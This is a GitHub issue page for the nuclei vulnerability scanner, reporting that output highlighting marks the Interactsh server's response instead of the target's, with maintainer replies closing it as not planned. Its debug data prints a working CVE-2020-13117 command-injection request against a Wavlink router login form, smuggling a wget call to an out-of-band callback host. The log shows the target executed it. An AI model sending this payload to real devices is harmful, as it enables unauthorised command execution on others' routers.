nuclei icon indicating copy to clipboard operation
nuclei copied to clipboard

Published 20 hours ago verified publisher icon projectdiscovery

Highlighting issue with interactsh matcher

Open princechaddha opened this issue 3 years ago • 1 comments

Nuclei version:

Nuclei Engine 2.7.0

  • [ ] Highlight correct matched section
  • [ ] Do not highlight unrelated / unmatched section

Current Behavior:

The status code of Interactsh Server's response is currently highlighted rather than the target server. When the Interactsh Server is used in the matcher, even the word is not highlighted as the highlighting module is looking for the word in the Interactsh Server's response.

Expected Behavior:

Rather than Interactsh Server's response, the highlighting should work on the target's response

Steps To Reproduce:

Example: steps to reproduce the behavior:

  1. Run nuclei-template on any host with Interactsh matcher

Debug Data

POST /cgi-bin/login.cgi HTTP/1.1
Host: <redacted>

newUI=1&page=login&username=admin&langChange=0&ipaddr=<redacted>&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2Fca0dvhdcefo1rrgm0ts0qg6417zd1boz9.oast.me%3B%60%3B%23&password=asd&lang_select=en

[DBG] [CVE-2020-13117] Dumped HTTP response http://<redacted>:80/cgi-bin/login.cgi

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Cache-Control: no-cache
Content-Type: text/html
Date: Thu, 15 Jan 1970 04:03:04 GMT
Pragma: no-cache
Server: lighttpd/1.4.20

<html><head><script language="JavaScript">parent.location.replace("http://wifi.wavlink.com/login.shtml?login=0");</script></head></html>
[ca0dvhdcefo1rrgm0ts0qg6417zd1boz9] Received HTTP interaction from <redacted> at 2022-05-15 11:11:03
------------
HTTP Request
------------

GET / HTTP/1.1
Host: ca0dvhdcefo1rrgm0ts0qg6417zd1boz9.oast.me
Connection: close
Connection: close
User-Agent: Wget

------------
HTTP Response
------------
+HTTP/1.1 200 OK

Connection: close
Content-Type: text/html; charset=utf-8
Server: oast.me

<html><head></head><body>9zob1dz7146gq0st0mgrr1ofecdhvd0ac</body></html>

[2022-05-15 16:41:07] [CVE-2020-13117:word-1] [http] [critical] http://<redacted>:80/cgi-bin/login.cgi
[2022-05-15 16:41:07] [CVE-2020-13117:word-2] [http] [critical] http://<redacted>:80/cgi-bin/login.cgi
[2022-05-15 16:41:07] [CVE-2020-13117:status-3] [http] [critical] http://<redacted>:80/cgi-bin/login.cgi

princechaddha avatar May 15 '22 11:05 princechaddha

After investigation, the problem with highlighting response body is that HTTP module does not have access to result event while printing the response dump. The interactsh module keeps the events in a cache and only upon getting a hit prints the interactsh debug event, while the HTTP has been already printed.

So moving the HTTP debugging to interactsh Is not an option. A thing we can do is also print a highlighted response in the interactsh module after receiving an interaction. Any other ideas are also appreciated! Meanwhile putting this issue on hold.

Ice3man543 avatar May 24 '22 10:05 Ice3man543

Considering the implementation complexity, I'm closing this as not planned for the time being

Mzack9999 avatar Dec 01 '22 15:12 Mzack9999